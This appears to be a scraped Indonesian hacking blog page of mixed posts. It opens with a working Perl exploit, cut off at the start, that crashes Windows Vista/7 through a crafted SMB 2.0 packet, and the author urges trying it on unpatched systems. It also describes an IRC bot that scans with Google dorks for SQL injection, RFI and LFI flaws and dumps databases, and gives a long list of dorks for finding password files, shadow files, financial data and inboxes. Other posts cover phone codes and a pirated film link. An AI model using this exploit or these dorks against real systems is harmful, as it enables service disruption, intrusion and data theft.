print "#! Usage: Smb-Bsod.pl 127.0.0.1 !#\n\n\a";
exit;
}
my $port = '445';
my $payload = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"$port", Timeout=>'15') || die "Exploit failed to connect to the machine.\n\n";
print "System has been successfully exploited!\n\a";
print "Attempting to inject payload...\n";
sleep(4);
print $sock "$payload";
print "Payload has been injected successfully!\n\a";
close($sock);
#coded by Phizo-
#vulnerability discovered by Laurent Gaffié-
==============================================================
This code is user friendly, and you should be able to use this exploit. Do not rip this and call it your own either :) I will know, because this is unique and no one else has created this exploit in perl.
Enjoy the exploit! (Some systems have patched this, but you can still try, some people don't patch :P)
Baca Selengkapnya...
WinVista/7 SMB 2.0 BSoD Exploit! - Coded by Phizo
ScalezBot IRCBot v1.0 Features:
RFI GoogleDork Scanner
LFI GoogleDork Scanner
SQL Injection GoogleDork Scanner
MySQL column counter
MsSQL Information gatherer (version, tables, etc.)
MySQL Information gatherer (version, tables, etc.)
MySQL Database Dumper
MySQL Schema Dumper
Open Source
Changelog:
- Version 1.0
[+] uri_escape() Google Search ban bypass
[+] MsSQL information gatherer
[+] Microsoft Access Vulnerability Detection (for SQL Injection)
[--] Spreading Functions (byebye, skids)
[+] Dynamic Channel String Detection
Modules Needed:
(All of these come with perl by default, if you for some reason don't have them, go to http://www.cpan.org)
IO::Socket::INET
LWP::UserAgent
LWP::Simple
URI::Escape
XML::Simple
Digest::MD5 qw(md5_hex)
MIME::Base64
Commands:
!help............................//prints all of the commands to $channel
!col target....................//attempts to count culumns on 'target' (the URL)
!det target...................//grab MySQL details for 'target' (the URL)
!schema target............ //dump schema information (MySQL, target==URL)
!dump target................//dump MySQL details
!ms target...................//dump MsSQL details
!sqlscan dork shell........//start googledork sql injection scan (where shell is the shell URL)
!rfiscan dork................//start googledork RFI scan
!lfiscan dork................//start LFI googledork scan
!info..........................//bot information (author, etc.)
Usage:
Open the file with text editor. You will see a block that looks like this:
Code: #= CONFIGURATION ==========================#
my $server = "127.0.0.1"; #
my $nick = "scalez"; #
my $port = "61111"; #
my $channel = "#h1t3m#"; #
my $name = "scalez neconide sb unr"; #
#= END OF CONFIGURATION ===================#
(NOTE: If you're on windows, it wont be parsed. It will have little squares instead. This is fine, just edit the configuration then run the script)
edit $server to the IRC server, $nick to the nickname, $port to the port to connect on, and $channel to the channel you want it to join.
Baca Selengkapnya...
ScalezBot IRCBot v1.0
Inception (2010) DVDRip XviD
Director: Christopher Nolan
Writer (WGA): Christopher Nolan
Release Date:16 July 2010 (USA)
Genre:Mystery | Sci-Fi | Thriller
Plot:
In a world where technology exists to enter the human mind through dream invasion, a single idea within one's mind can be the most dangerous weapon or the most valuable asset...
Download with Folder link's
Code: http://fileserve.com/list/AxrkGfM
Baca Selengkapnya...
Inception (2010) DVDRip XviD
Nah! tiba waktunya kita memanfaatkan "Paman Google" ini untuk search (nyari apa saja di internet) dengan waktu dan teknik yang bisa disebut "tepat". Lagi-lagi ini juga hasil dari berbagai hunting saya di berbagai web dan blog teman2 semua. Oleh karena itu ga salah juga saya pun turut andil ingin bagi-bagi informasi.
Pertama, Anda bisa mencari dari :
1. Iklan Google yang ada di semua situs, hasilnya akan sama saja.
2. Tombol Google search yang ada di toolbar.
3. Google main search Engine : http://www.google.com/
Selanjutnya agar pencarian bisa paling mendekati keinginan Anda, ikuti tips berikut :
Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.
"Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yangdimaksud. Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.
“inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.
Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut. Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.
>“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.
“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google.
Sebagai contoh:
“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org
“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian :
“filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.
“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityf
ocus.com” akan menunjukan daftar webpage yang memiliki point link pada page SecurityFocus.
“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan. Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.
“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya. Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.
ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of /admin.asp"
"Index of /login.asp"
Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :
inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe
llinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery
Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
ntitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*
Dibawah ini ada beberapa contoh kasus:
(silahkan mencoba...segala resiko berkenaan dengan security website yang dituju...merupakan tanggung jawab masing-masing)
Operator dasar
+, -, ~ , ., *, “”, |, OR
Operator tambahan
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange
Extensi yang dapat dicari:
HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)
Pencarian gaji
Salary filetype: xls site: edu
Salary filetype: xls site: edu
Informasi financial
Filetype: xls “checking account” “credit card” -intext: Application -intext: Form
Intitle: “Index of” finances.xls
Mencari inbox e-mail
Intitle: Index.of inurl: Inbox (456) (mit mailbox)
Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)
Mendeteksi OS
"Microsoft-IIS/5.0 server at”
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0
Intitle: Test.Page.for.Apache seeing.this.instead
Intitle: Test.page “SSL/TLS-aware”
Mencari password
Inurl: etc inurl: passwd
Intitle: “Index of..etc” passwd
"# -FrontPage-" inurl: service.pwd
Inurl: admin.pwd filetype: pwd
Filetype: inc dbconn
Filetype: inc intext: mysql_connect
Filetype: ini +ws_ftp +pwd
Filetype: log inurl: “password.log”
Mencari User Name
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”
Mencari License Key
Filetype: lic lic intext: key
Sensitve Directories Listing
Intitle: “Index of” cfide
Intitle: index.of.winnt
Intitle: “index of” iissamples
saya tak bertanggung jawab atas setiap kegiatan anda yang mengargumenkan artikel ini.........
maaf........ resiko ditanggung sendiri........ by Ferdy Ansa a.k.a Hacker Mania
Baca Selengkapnya...
Memanfaatkan fitur yang tersedia........ ( by mbah google )......
Posting ini benar-benar mungkin terlihat konyol bagi Anda semua tetapi sebenarnya hal-hal yang berguna ..
Di bawah ini tercantum semua kode rahasia yang digunakan oleh (Reliance CDMA) Reliance's dealer, dan spys KnowBest.info s 'telah secara eksklusif mendapatkan semua kode hanya untuk Anda.
Untuk checka tanggal aktivasi nomor tertentu RSN dan nomor mobile
Kirim SMS ke 53.738 berikut:
1.
ODR RSNNUMBER
(Trik ini benar-benar akan bekerja saat ponsel Anda hilang dan Anda ingin memeriksa status)
1.
Untuk memeriksa tanggal aktivasi nomor ponsel tertentu:
Kirim SMS ke 53.738 berikut:
ODM MOBILENUMBER
2.
Untuk memeriksa status nomor RSN.
Kirim SMS ke 53.738 berikut:
GETSTAT RSNNUMBER
(Kode ini menunjukkan status handset Anda. Apakah itu dilaporkan hilang atau sebagainya ..)
3.
Untuk memeriksa status aplikasi Anda:
Kirim SMS ke 53.738 berikut:
STAT RSNNUMBER
(Ini benar-benar berguna saat Anda membeli ponsel baru dan Anda ingin memeriksa status penerapannya)
Baca Selengkapnya...
KODE RAHASIA UNTUK PENGGUNA KETERGANTUNGAN Ponsel
jika Anda ingin membuka ponsel nokia Anda bebas sehingga semua simcards dapat digunakan di dalamnya, ikuti langkah-langkah dengan benar sehingga Anda membuka ponsel nokia tanpa problem.to pun membuka pencarian mobile gratis Anda untuk membuka kode pada bersih atau periksa kembali saya akan posting Anda membuka kode untuk ponsel nokia.
METODE UNTUK UNLOCK LANGKAH - Cara Masukkan Nokia membuka Kode untuk membuka...
1.Hapus simcard Anda dan beralih pada ponsel Anda
2. Tulis pw # + kode 1 # ("kode" dimaksudkan untuk menjadi aktual membuka kode, yang Anda dapat membeli memeriksa posting baru saya)
KODE JIKA ATAS IS REJECTED, PENGGANTI ATAS 1 DENGAN 7.SO IT IS: # PW + YOURCODE 7 #
Huruf P muncul setelah Anda cepat tekan 3 kali tombol bintang (*)
Surat W muncul setelah Anda cepat tekan 4 kali tombol bintang (*)
The + surat muncul setelah Anda cepat tekan 2 kali tombol bintang (*)
Ponsel menunjukkan "SIM Restriction Off" dan telepon dibuka!
cara ini Anda dapat membuka ponsel nokia Anda bebas tanpa risiko membayar untuk banyak layanan centre.you sel bisa melakukannya sepenuhnya gratis jika Anda mengetahui kode unlock ponsel nokia.
Baca Selengkapnya...
CARA UNTUK UNLOCK NOKIA MENGGUNAKAN KODE INSTRUKSI
Sebuah SMS sekali dihapus tidak dapat dibaca lagi ... pesan. Tapi kadang-kadang kita tidak sengaja menghapus beberapa penting. Berikut adalah teknik yang harus diikuti untuk mengambil SMS dihapus.
Diperlukan utilitas:
1) Setiap sistem atau file explorer explorer program (misalnya fileman atau fexplorer.provided dengan paket)
Langkah 1) Fexplorer Buka... Lihat Selengkapnya
Langkah 2) Pilih drive C: atau D: tergantung pada memori di mana pesan Sms telah disimpan.
Langkah 3) Sebagai contoh u dipilih c:, Lalu terbuka "sistem" folder.
Langkah 4) Kemudian pada "sistem" buka folder "mail" folder.
Langkah 5) Kemudian pada folder ini u akan melihat folder yang berbeda (misalnya 0010001_s) dan file tertentu (misalnya 00100000).
File-file ini adalah pesan yang sebenarnya. Menelusuri setiap folder dan membuka semua file sampai u mendapatkan sms u cari.
Langkah 6) Untuk membuka file yang tidak memilih pilihan> file> terbuka seperti itu akan menampilkan format yang tidak didukung lebih memilih Pilihan> hex file> / penampil teks.
Dengan memilih "Hex / penampil teks" akan ll u bisa membuka dan membaca pesan SMS dihapus
Baca Selengkapnya...
Trick membaca pesan/sms yg telah terhapus
Hampir semua orang pada saat ini mempunyai handphone. Mereka ingin menggunakan handphone mereka secara maksimal seperti menggunakannya untuk akses internet namun mereka tidak tahu bagaimana cara mensetting GPRS handphone mereka sesuai provider yang mereka gunakan masing-masing.
Mereka sudah berusaha untuk menanyakan ke teman mereka, call center operator yang dipakai untuk menanyakan bagaimana caranya mensetting GPRS handphone mereka, namu terkadang upaya tersebut sia-sia. Kami akan memberikan anda cara setting GPRS sesuai provider/operator yang anda gunakan.
- Excelcomindo
APN : www.xlgprs.net
Username: xlgprs
Password: proxl
DNS: 202.152.254.245 / 202.152.254.246
Proxy: 202.152.240.50 port 8080/9201
- IM3
APN: www.indosat-m3.net / wap.indosat-m3.net
Username: gprs
Password: im3
DNS: 202.155.46.66 / 202.155.46.77
SMTP: mail.indosat-m3.net
Proxy: 10.19.19.19 port 8080/9201
- Indosat(Matrix)
APN: satelindogprs.com / indosatgprs
Username: guest
Password: guest
DNS: 202.155.46.66 / 202.155.46.77
SMTP: smtp.indosat.net.id
Proxy: 202.152.162.88 port 8080/9201
- Telkomsel
APN: internet / telkomsel
Username: wap
Password: wap123
DNS: 202.152.0.2 / 202.155.14.251 / 202.155.14.253
SMTP: mail.telkomsel.com
Proxy: 10.1.89.130 port 8000/9201
Selamat mencoba, Good Luck
Admin: s60_forum
Baca Selengkapnya...
Cara Setting HP sebgai modem GPRS
|